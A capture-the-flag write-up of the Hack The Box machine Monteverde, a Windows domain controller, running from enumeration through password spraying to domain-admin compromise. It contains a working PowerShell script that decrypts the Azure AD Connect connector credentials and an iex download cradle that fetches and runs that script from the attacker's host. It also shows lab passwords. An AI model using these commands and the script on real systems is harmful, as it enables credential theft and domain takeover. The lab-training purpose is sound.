> [!caution] Pro-Tip
> Always look up the write-ups only once you have fully tried everything and exhausted your knowledge. Make sure that whenever you read a write-up you learn something new, not "Oh shit, I knew that, I should have tried that". It should be "Oh, that's new, great to learn this new skill, let's add it to my arsenal of skills". This is what eventually builds up your skills, and you'll pick up many new ones along the way.

> IP address - 10.10.10.172

## Recon

### Nmap

A quick scan of all TCP ports with a high `--min-rate` to find what's open. The full output isn't reproduced here; one thing to keep in mind is that WinRM on TCP 5985 is also open (it's used later) and is not in the default top-1000 ports the `-sV` scan below covers:

```
nmap -p- --min-rate 10000 -Pn -oA nmap-alltcp 10.10.10.172
```

Service and version detection (`-sV`) against the default ports:

```
┌──(kali㉿kali)-[~/HTB]
└─$ nmap -Pn -sV 10.10.10.172
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-28 18:13 EST
Nmap scan report for 10.10.10.172
Host is up (0.18s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-28 23:13:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.95 seconds
```

As we can see, the machine looks like a domain controller for **megabank.local** (hostname `MONTEVERDE`), and there are a few interesting services including **SMB** (TCP/445) and **LDAP** (TCP/389). These are all typical Windows ports. The Kerberos banner also leaks the DC's clock (23:13:48Z), which matches our 18:13 EST, so there is no skew to correct before using Kerberos-based tooling.
Seeing TCP DNS (53) along with Kerberos (TCP 88) and LDAP (TCP 389) suggests this might be a domain controller.

### SMB Without Creds - TCP 445

Doesn't look like I can connect to anything on SMB without creds. The null session is accepted, but no shares come back:

```sh
┌──(kali㉿kali)-[~/HTB]
└─$ smbclient -N -L //10.10.10.172
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/HTB]
└─$ smbmap -H 10.10.10.172
[+] IP: 10.10.10.172:445        Name: 10.10.10.172
```

### RPC - TCP 445

I am able to get an RPC session without creds, and `querydispinfo` dumps the domain users:

```
┌──(kali㉿kali)-[~/HTB]
└─$ rpcclient -U "" -N 10.10.10.172
rpcclient $> querydispinfo
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2  Name: AAD_987d7f2f57d2  Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos  Name: Dimitris Galanos  Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)  Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope  Name: Mike Hope  Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary  Name: Ray O'Leary  Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs  Name: SABatchJobs  Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan  Name: Sally Morgan  Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata  Name: svc-ata  Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec  Name: svc-bexec  Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp  Name: svc-netapp  Desc: (null)
rpcclient $>
```

I did some looking at each user and group, but didn't identify anything that interesting. The user list itself is the main takeaway. Two details in the dump are still worth a note: the description on `AAD_987d7f2f57d2` says the Azure AD Connect "Synchronization Service" is installed on MONTEVERDE, and the `acb` value `0x00000215` on `Guest` carries the disabled bit (`0x0001`), so that account can be dropped from any password guessing.
## Shell as mhope

### Credential Brute Force

I added the users from `querydispinfo` to a file, one per line, so the same file can serve as both the username list and the password list.

> [!note]
> After poking around at other things and finding very little, I came back to the usernames I had. I created a file with one user per line, and one of the things I checked was whether any account used its username as its password, using `crackmapexec`. This is a form of password spraying, because I really only want to check one password per user. Because my list is small and this is HTB, I'll just try each user with every username as the password. In a real environment I'd only try each user with its own username, and I'd pull the domain lockout policy first (for example `crackmapexec smb 10.10.10.172 -u '' -p '' --pass-pol`): with `--continue-on-success` a 7-user list crossed with 7 passwords is 49 attempts, enough to lock accounts out under a low threshold.

Here `Monteverde` is the username file, passed as both `-u` and `-p`:

```
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec smb 10.10.10.172 -u Monteverde -p Monteverde --continue-on-success
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:roleary STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:smorgan STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-ata STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-bexec STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-netapp STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:mhope STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:roleary STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:SABatchJobs STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:smorgan STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:svc-ata STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:svc-bexec STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:svc-netapp STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:roleary STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
```

I got a match: `SABatchJobs:SABatchJobs`. The rest were fails.

### SMB with Creds - TCP 445

`smbmap` tells me what shares there are and what I have access to (output cleaned up a bit):

```
┌──(kali㉿kali)-[~/HTB]
└─$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs
[+] IP: 10.10.10.172:445        Name: 10.10.10.172
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        azure_uploads                                           READ ONLY
        C$                                                      NO ACCESS       Default share
        E$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
        users$                                                  READ ONLY
```

I looked through each share. I can connect with `smbclient` and poke around, or use `smbmap` to list out files. Either way, I find something interesting in the `users$` share:

```
┌──(kali㉿kali)-[~/HTB]
└─$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs -R 'users$'
[+] IP: 10.10.10.172:445        Name: 10.10.10.172
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        users$                                                  READ ONLY
        .\users$\*
        dr--r--r--                0 Fri Jan  3 08:12:48 2020    .
        dr--r--r--                0 Fri Jan  3 08:12:48 2020    ..
        dr--r--r--                0 Fri Jan  3 08:15:23 2020    dgalanos
        dr--r--r--                0 Fri Jan  3 08:41:18 2020    mhope
        dr--r--r--                0 Fri Jan  3 08:14:56 2020    roleary
        dr--r--r--                0 Fri Jan  3 08:14:28 2020    smorgan
        .\users$\mhope\*
        dr--r--r--                0 Fri Jan  3 08:41:18 2020    .
        dr--r--r--                0 Fri Jan  3 08:41:18 2020    ..
        fw--w--w--             1212 Fri Jan  3 09:59:24 2020    azure.xml
```

There's a file at `\\10.10.10.172\users$\mhope\azure.xml`.
I'll grab it with `smbclient`:

```
┌──(kali㉿kali)-[~/HTB]
└─$ smbclient -U SABatchJobs //10.10.10.172/users$ SABatchJobs -c 'get mhope/azure.xml azure.xml'
getting file \mhope\azure.xml of size 1212 as azure.xml (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
```

The file is a PowerShell CLIXML export (what `Export-Clixml` produces) of a `PSADPasswordCredential` object, the Az module's type for an Azure AD application or service-principal password credential. The secret is stored in clear text in the `Password` property:

```xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
```

> `Password: 4n0therD4y@n0th3r$`

The file sits in mhope's home folder, so the obvious check is whether mhope reused this password for the domain account. `crackmapexec` against WinRM confirms it:

```
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
WINRM       10.10.10.172    5985   MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
WINRM       10.10.10.172    5985   MONTEVERDE       [*] http://10.10.10.172:5985/wsman
WINRM       10.10.10.172    5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
```

Then log in using evil-winrm:

```
┌──(kali㉿kali)-[~/HTB]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> ls

    Directory: C:\Users\mhope

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                .Azure
d-r---         1/3/2020   5:24 AM                3D Objects
d-r---         1/3/2020   5:24 AM                Contacts
d-r---         1/3/2020   5:47 AM                Desktop
d-r---         1/3/2020   5:24 AM                Documents
d-r---         1/3/2020   5:24 AM                Downloads
d-r---         1/3/2020   5:24 AM                Favorites
d-r---         1/3/2020   5:24 AM                Links
d-r---         1/3/2020   5:24 AM                Music
d-r---         1/3/2020   5:24 AM                Pictures
d-r---         1/3/2020   5:24 AM                Saved Games
d-r---         1/3/2020   5:24 AM                Searches
d-r---         1/3/2020   5:24 AM                Videos

*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls

    Directory: C:\Users\mhope\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       12/28/2023   2:58 PM             34 user.txt

*Evil-WinRM* PS C:\Users\mhope\Desktop> cat usr.txt
Cannot find path 'C:\Users\mhope\Desktop\usr.txt' because it does not exist.
At line:1 char:1
+ cat usr.txt
+ ~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\mhope\Desktop\usr.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
9f9f30bbf3fea91721901db1a649****
*Evil-WinRM* PS C:\Users\mhope\Desktop>
```

## Priv: mhope -> administrator

### Enumeration

> [!note]
> I already had a hint that this box has something with Azure Active Directory going on when I saw the `azure_uploads` share (and, earlier, the `AAD_987d7f2f57d2` account's description and the `.Azure` folder in mhope's profile).
Looking at mhope's groups, I see `Azure Admins`. Checking the user's privileges:

```
*Evil-WinRM* PS C:\Users\mhope\Desktop> net user mhope
User name                    mhope
Full Name                    Mike Hope
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/2/2020 3:40:05 PM
Password expires             Never
Password changeable          1/3/2020 3:40:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory               \\monteverde\users$\mhope
Last logon                   12/28/2023 3:55:34 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Azure Admins         *Domain Users
The command completed successfully.
```

mhope is a member of the local **Remote Management Users** group (`net user` truncates the name to `Remote Management Use`), which is what allows the WinRM login, and of the global **Azure Admins** group. The Azure AD Connect installation is also on disk at `C:\Program Files\Microsoft Azure AD Sync`, which is where the script below loads `mcrypt.dll` from.

Azure AD Connect stores the credentials of the on-prem AD connector account encrypted in its `ADSync` SQL database, and the key material needed to decrypt them can be recovered by anyone who can read that database and load the product's own `mcrypt.dll`. The `Azure Admins` group on this box has that database access. The technique is from this blog post, which is the one to read for the details: https://blog.xpnsec.com/azuread-connect-for-redteam/

The script below (adapted from that post) reads the keyset identifiers and the AD connector configuration from the database, decrypts the password with the Azure AD Connect `KeyManager`, and prints the domain, username and password:

```powershell
# Connect to the ADSync database. This box runs a full SQL Server, hence 127.0.0.1;
# on a LocalDB-backed install the data source is "(localdb)\.\ADSync" instead.
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()

# Keyset identifiers needed to load the key material that protects the config
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

# The AD management agent: clear-text XML (forest domain and user) plus the
# encrypted blob that holds the connector account's password
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

# Decrypt with Azure AD Connect's own crypto library, the same way the sync service does
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Domain and username come from the XML config, the password from the decrypted blob
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
```

Serve the script from our machine and run it in memory on the target.

On our machine:

```
python3 -m http.server 80
```

On the target:

```
iex(new-object net.webclient).downloadstring('http://10.10.14.11/lmao.ps1')
```

Outcome:

```
*Evil-WinRM* PS C:\Program Files> iex(new-object net.webclient).downloadstring('http://10.10.14.11/lmao.ps1')
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
```

Interestingly, it gives the administrator account password. That must be the replication account here, instead of the dedicated `MSOL_` account I saw in the documentation. That is the real misconfiguration on this box: the AD connector is meant to be a least-privileged account, and when it is a Domain Admin, anyone who can read the ADSync database owns the domain.

### Shell Over WinRM

```
┌──(kali㉿kali)-[~/HTB]
└─$ evil-winrm -i 10.10.10.172 -u administrator -p 'd0m@in4dminyeah!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
9f72aa4172cfd2843c216e458fa3****
```

#BOOM I should get food now :XD